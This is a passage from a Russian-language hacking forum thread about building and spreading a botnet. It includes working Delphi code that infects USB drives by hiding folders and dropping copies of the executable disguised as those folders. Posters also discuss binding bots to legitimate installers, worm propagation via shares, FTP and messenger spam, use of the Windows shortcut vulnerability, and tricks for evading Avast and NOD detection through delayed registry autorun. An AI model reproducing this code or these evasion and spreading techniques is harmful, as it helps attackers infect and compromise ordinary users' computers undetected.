|
Ботнет
| |
| gravitas | Дата: Воскресенье, 05.12.2010, 12:35 | Сообщение # 26 |
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
| Quote (Гришка-Страшный) Я читал, что Kido использовал 3 способа распространения: флешки, по локалке подбирая пароль к другому компу и с сайтов через эксплойты...
Загрузки - самый лучший способ. Но можн так же и через флешки и т.д.
TheDeduction
Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
|
| |
| |
| cool1 | Дата: Воскресенье, 05.12.2010, 12:40 | Сообщение # 27 |
Участник
Зарегистрирован: 14.07.2010
Группа: Пользователи
Сообщений: 238
Статус: Offline
| gravitas,
дай пример тваего бот нета просто сайт ты ведь забросил
За помощь ставьте +!
|
| |
| |
| Гришка-Страшный | Дата: Воскресенье, 05.12.2010, 12:52 | Сообщение # 28 |
Был не раз
Зарегистрирован: 16.08.2010
Группа: Пользователи
Сообщений: 19
Статус: Offline
| Ну у меня на защите курсача явано не прокатит объяснение, что я собираюсь через загрузки его распространять=)
|
| |
| |
| cool1 | Дата: Воскресенье, 05.12.2010, 12:56 | Сообщение # 29 |
|
Участник
Зарегистрирован: 14.07.2010
Группа: Пользователи
Сообщений: 238
Статус: Offline
| А как насчет размножение на съемных насителях?
вот dolphin писал - ищем съемные носители
Code procedure InfectUsb;
var
DiskType,ifind : integer;
Drives : set of 0..25;
Drv : char;
begin
try
Integer(Drives):=GetLogicalDrives;
for ifind:=0 to 25 do
if (ifind in Drives) then
begin
Drv:=Char(ifind+Ord('A'));
DiskType:=GetDriveType(PChar(Drv+':\'));
if (DiskType = DRIVE_REMOVABLE) then
begin
InfectDir(PChar(Drv+':\'));
end;
end
except
exit;
end;
end;
ну эта Инфецирует папки на них, то есть замещает собой и скрывает
Code procedure InfectDir(Root: String);
var
F: TSearchRec;
i: Integer;
h: THandle;
L: TStringList;
begin
L:=TStringList.Create;
L.Clear;
L.Add(Root);
i := 0;
while i < L.Count do begin
Root := IncludeTrailingBackslash(L.Strings[i]);
h := FindFirst(Root + '*.*', faAnyFile, F);
while h = 0 do begin
if (F.Attr and faDirectory) = faDirectory then begin
if (F.Name <> '.') and (F.Name <> '..') then begin
L.Add(Root + F.Name);
SetFileAttributes(PChar(Root+F.Name),faHidden);
CopyFile(pchar(ParamStr(0)),pchar(Root + F.Name+'.exe'),false);
SetFileAttributes(PChar(Root+F.Name+'.exe'),faArchive);
end;
end;
h :=FindNext(F);
end;
FindClose(F);
Inc(i);
end;
L.Free;
end;
За помощь ставьте +!
Сообщение отредактировал cool1 - Воскресенье, 05.12.2010, 12:58 |
| |
| |
| Гришка-Страшный | Дата: Воскресенье, 05.12.2010, 13:08 | Сообщение # 30 |
|
Был не раз
Зарегистрирован: 16.08.2010
Группа: Пользователи
Сообщений: 19
Статус: Offline
| У мена авторан не работает...На флешку я понимаю как закинуть...
Проблема запустить с флешки.
|
| |
| |
| cool1 | Дата: Воскресенье, 05.12.2010, 13:11 | Сообщение # 31 |
|
Участник
Зарегистрирован: 14.07.2010
Группа: Пользователи
Сообщений: 238
Статус: Offline
| тут без авторана допустим на флэхе есть папка фото этот код ищет тваю флэху делает папку фото сркытой и копируется на флэху как фото.exe!
За помощь ставьте +!
Сообщение отредактировал cool1 - Воскресенье, 05.12.2010, 13:11 |
| |
| |
| Гришка-Страшный | Дата: Воскресенье, 05.12.2010, 13:24 | Сообщение # 32 |
|
Был не раз
Зарегистрирован: 16.08.2010
Группа: Пользователи
Сообщений: 19
Статус: Offline
| Это сработает, если человек попытается открыть эту папку.Но, например, у меня отображается расширение файлов и показываются все скрытые...и я вряд ли запущу фото.ехе...хотя способ тоже хороший=)))
Надо чтобы было автоматически..Как в Stuxnet'e допустим.
|
| |
| |
| cool1 | Дата: Воскресенье, 05.12.2010, 13:44 | Сообщение # 33 |
|
Участник
Зарегистрирован: 14.07.2010
Группа: Пользователи
Сообщений: 238
Статус: Offline
| может джоем с чем нить слепить
За помощь ставьте +!
|
| |
| |
| Гришка-Страшный | Дата: Воскресенье, 05.12.2010, 13:50 | Сообщение # 34 |
|
Был не раз
Зарегистрирован: 16.08.2010
Группа: Пользователи
Сообщений: 19
Статус: Offline
| Ну я сегодня ночь уже слепил...Правда джой сам писал...шел по принципу
1.создаю файл
2.запихиваю распаковщик
3.первый файл
4.второй файл
при распаковке
1.запускается распаковщик
2.первый файл (бот) копируется в системную директорию и запускается
3.второй файл создается рядом со склеенным и тоже запускается
...но я не знаю как удалить склеенный...
Подскажите может как по-другому сделать...
|
| |
| |
| gravitas | Дата: Воскресенье, 05.12.2010, 16:56 | Сообщение # 35 |
|
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
| Quote (Гришка-Страшный) Ну я сегодня ночь уже слепил...Правда джой сам писал...шел по принципу 1.создаю файл 2.запихиваю распаковщик 3.первый файл 4.второй файл при распаковке 1.запускается распаковщик 2.первый файл (бот) копируется в системную директорию и запускается 3.второй файл создается рядом со склеенным и тоже запускается ...но я не знаю как удалить склеенный... Подскажите может как по-другому сделать...
Боты не клеят. По слухам говорится, что они попадают на компы (метод загрузок) через сплоиты (это слово я тебе обьяснять не буду, ибо недорос. Без обид). Так что клеить файл не надо.
cool1, как освобожусь кину в асю.
Quote (Гришка-Страшный) Это сработает, если человек попытается открыть эту папку.Но, например, у меня отображается расширение файлов и показываются все скрытые...и я вряд ли запущу фото.ехе...хотя способ тоже хороший=))) Надо чтобы было автоматически..Как в Stuxnet'e допустим.
В нем юзается (используется) уязвимость ярлыков винды. Тут тоже попахивает крутыми знаниями (для тебя), так что тебе это познавать можно даже не пытаться.
TheDeduction
Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
|
| |
| |
| cool1 | Дата: Воскресенье, 05.12.2010, 18:19 | Сообщение # 36 |
|
Участник
Зарегистрирован: 14.07.2010
Группа: Пользователи
Сообщений: 238
Статус: Offline
| а ну дай сваего бота зыкнуть
За помощь ставьте +!
|
| |
| |
| gravitas | Дата: Воскресенье, 05.12.2010, 18:42 | Сообщение # 37 |
|
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
| Я ж сказал. Как освобожусь кину в асю.
TheDeduction
Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
|
| |
| |
| cool1 | Дата: Воскресенье, 05.12.2010, 18:44 | Сообщение # 38 |
|
Участник
Зарегистрирован: 14.07.2010
Группа: Пользователи
Сообщений: 238
Статус: Offline
| сори не заметил =D
За помощь ставьте +!
|
| |
| |
| C@T | Дата: Воскресенье, 05.12.2010, 22:24 | Сообщение # 39 |
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
| можно клеится к ехе файлам http://delfcode.ru/forum/10-324-1 , кстати в семерки перед открытием стоит проверка на тип файла(если назвать файл фотка.ехе как фотка.jpg то семерка откроет фотка.jpg как ехе файл) еще можно смотреть какие папки расшарены у разных прог типа ДС клиентов и клеится к файлам которые там и сувать туда фейковые файлы еще можно плодится через ICQ и социальные сети Quote (gravitas) В нем юзается (используется) уязвимость ярлыков винды. Тут тоже попахивает крутыми знаниями (для тебя), так что тебе это познавать можно даже не пытаться.
на самом деле все очень просто http://www.xakep.ru/post/53950/default.asp
|
| |
| |
| gravitas | Дата: Воскресенье, 05.12.2010, 22:26 | Сообщение # 40 |
|
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
|
Это нам просто. Я ту статью читал и вроде как разобрался. А вот тот человек вряд ли...
Кстати использование данной дыры в винде в вирусах\червях уже палится антивирусами
TheDeduction
Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
|
| |
| |
| Гришка-Страшный | Дата: Понедельник, 06.12.2010, 10:41 | Сообщение # 41 |
|
Был не раз
Зарегистрирован: 16.08.2010
Группа: Пользователи
Сообщений: 19
Статус: Offline
| Quote (gravitas) В нем юзается (используется) уязвимость ярлыков винды. Тут тоже попахивает крутыми знаниями (для тебя), так что тебе это познавать можно даже не пытаться.
Эта уязвимость уже давно всеми аверами палится. Я ее использовал для распространения в августе, а к середине сентября она была уже закрыта.
Quote (gravitas) Боты не клеят. По слухам говорится, что они попадают на компы (метод загрузок) через сплоиты (это слово я тебе обьяснять не буду, ибо недорос. Без обид). Так что клеить файл не надо.
Еще раз повторяю. Во-первых, мне объяснение распространения через загрузки явно не покатит при защите курсача. Во-вторых, распространение только через загрузки дорого и не очень эффективно.Надо чтобы бот использовал все возможные распространения, основным из которых является распространение типа "червь".
|
| |
| |
| gravitas | Дата: Понедельник, 06.12.2010, 11:38 | Сообщение # 42 |
|
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
| Quote (Гришка-Страшный) аспространение только через загрузки дорого и не очень эффективно
Дорого - не спорю. А вот про не эффективность... Некоторые торгаши могут делать до 30000 загрузок в день. Разве это не эффективно?!
Quote (Гришка-Страшный) Надо чтобы бот использовал все возможные распространения
В последнее время (а мож и всегда) черви используют для распространнения следующие методы:
1. Авторан на сьемных носителях
2. Расшаренные ресурсы
3. FTP
4. Через спам в каких либо сетях (ICQ или ВК например)
TheDeduction
Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
|
| |
| |
| Гришка-Страшный | Дата: Понедельник, 06.12.2010, 14:48 | Сообщение # 43 |
|
Был не раз
Зарегистрирован: 16.08.2010
Группа: Пользователи
Сообщений: 19
Статус: Offline
| Quote (gravitas) В последнее время (а мож и всегда) черви используют для распространнения следующие методы:
1. Авторан на сьемных носителях
2. Расшаренные ресурсы
3. FTP
4. Через спам в каких либо сетях (ICQ или ВК например)
Согласен.
А чем не устраивает распространение типа троя или склеивая с чем-то?\
Quote (gravitas) Дорого - не спорю. А вот про не эффективность... Некоторые торгаши могут делать до 30000 загрузок в день. Разве это не эффективно?!
Не эффективно...ну потому что очень дорого=)
А для меня одной из важных деталей в данном курсовике также является заражение конкретных машин, конкретных пользователей.
|
| |
| |
| gravitas | Дата: Понедельник, 06.12.2010, 16:48 | Сообщение # 44 |
|
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
| Quote (Гришка-Страшный) А для меня одной из важных деталей в данном курсовике также является заражение конкретных машин, конкретных пользователей.
Ну тогда с флешкой на атворане по ним всем пройдись 
Quote (Гришка-Страшный) склеивая с чем-то?\ Quote (gravitas)Дорого - не спорю. А вот про не эффективность... Некоторые торгаши могут делать до 3
А при склейке ты разве не запускаешь ничего? Точно такой же запуск идет.Quote (Гришка-Страшный) типа троя
Эт еще как? На сколько я знаю у них такое же распространнение как и всей остальной вирусни...
TheDeduction
Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
|
| |
| |
| Гришка-Страшный | Дата: Среда, 08.12.2010, 13:08 | Сообщение # 45 |
|
Был не раз
Зарегистрирован: 16.08.2010
Группа: Пользователи
Сообщений: 19
Статус: Offline
| Выделяют 3 основных способа распространения:
1.троян - это недокументированные функции программы. Человек сам скачивает себе прогу пользуется ей и кроме всего, для чего он ее использует прога скрытно от пользователя отправляет/собирает информацию, короче выполняет недокументированные возможности.
2.червь - используются сплоиты. Червь, попав на комп, ищет, например, контакты outlook и рассылает по ним ссылку на сайт со сполитом. А в локальной сети пытается получить доступ к удаленному компу и записать себя на него.
3.вирусы - относят остальные способы распространение, например, через съемные носители. Я склеиваю бота с какой-нибудь прогой, например, KMPlayer.
При запуске склеенного exe устанавливается и запускается бот, и запускается реальный КМPlayer.exe.
|
| |
| |
| gravitas | Дата: Среда, 08.12.2010, 13:31 | Сообщение # 46 |
|
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
| Quote (Гришка-Страшный) Выделяют 3 основных способа распространения: 1.троян - это недокументированные функции программы. Человек сам скачивает себе прогу пользуется ей и кроме всего, для чего он ее использует прога скрытно от пользователя отправляет/собирает информацию, короче выполняет недокументированные возможности. 2.червь - используются сплоиты. Червь, попав на комп, ищет, например, контакты outlook и рассылает по ним ссылку на сайт со сполитом. А в локальной сети пытается получить доступ к удаленному компу и записать себя на него. 3.вирусы - относят остальные способы распространение, например, через съемные носители. Я склеиваю бота с какой-нибудь прогой, например, KMPlayer. При запуске склеенного exe устанавливается и запускается бот, и запускается реальный КМPlayer.exe.
Круто. А где тут вопрос?
TheDeduction
Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
|
| |
| |
| Гришка-Страшный | Дата: Среда, 08.12.2010, 14:03 | Сообщение # 47 |
|
Был не раз
Зарегистрирован: 16.08.2010
Группа: Пользователи
Сообщений: 19
Статус: Offline
| Quote (gravitas) А при склейке ты разве не запускаешь ничего? Точно такой же запуск идет.
в моем случае человек сам должен запустить.
А у меня вопрос о том, как сделать так, чтобы автоматически запускалось при попадании на комп, через USB.
Вот сейчас нашел интересную статейку по авторанам, сижу, разбираюсь. Кстати никто не работал с timeGetTime?
Что надо подключить, чтобы работать с ней? все.Нашел.Надо было mmsystem подключить
Сообщение отредактировал Гришка-Страшный - Среда, 08.12.2010, 14:09 |
| |
| |
| gravitas | Дата: Среда, 08.12.2010, 14:13 | Сообщение # 48 |
|
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
| Quote (Гришка-Страшный) А у меня вопрос о том, как сделать так, чтобы автоматически запускалось при попадании на комп, через USB. Вот сейчас нашел интересную статейку по авторанам, сижу, разбираюсь.
Дельфин выложил на форуме в разделе вирусология очень хороший сорс сего.
TheDeduction
Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
|
| |
| |
| wmFest | Дата: Понедельник, 06.06.2011, 18:39 | Сообщение # 49 |
Частый гость
Зарегистрирован: 02.05.2011
Группа: Пользователи
Сообщений: 34
Статус: Offline
| gravitas, сообщением http://delfcode.ru/forum/29-367-1890-16-1290533488 заинтересовал 
в чём заключается данная пряморукость? чего делать не стоит?
например, мой троян жертвы запускают собственноручно. при запуске он выдаёт ошибку, а тем временем скачивает программу, прописывает её в реестр и запускает её. как только доходит дело до запуска - матерится аваст, предлагая запустить скачанный файл в песочнице; тем самым палит. решение - не запускать файл сразу, а оставить до перезагрузки. после перезагрузки благодаря реестру всё без проблем и криков запускается.
какие ещё можете привести примеры? по опыту
|
| |
| |
| gravitas | Дата: Понедельник, 06.06.2011, 18:54 | Сообщение # 50 |
|
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
| Quote (wmFest) какие ещё можете привести примеры? по опыту
НОД:
Палит любой авторан, если он выполняется в начале программы. Можно в самом начале запустить таймер, в котором прога добавляется в авторан, а потом убивает этот таймер. Можно таймер на поток заменить. И тогда палева не будет.
TheDeduction
Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
|
| |
| |
|
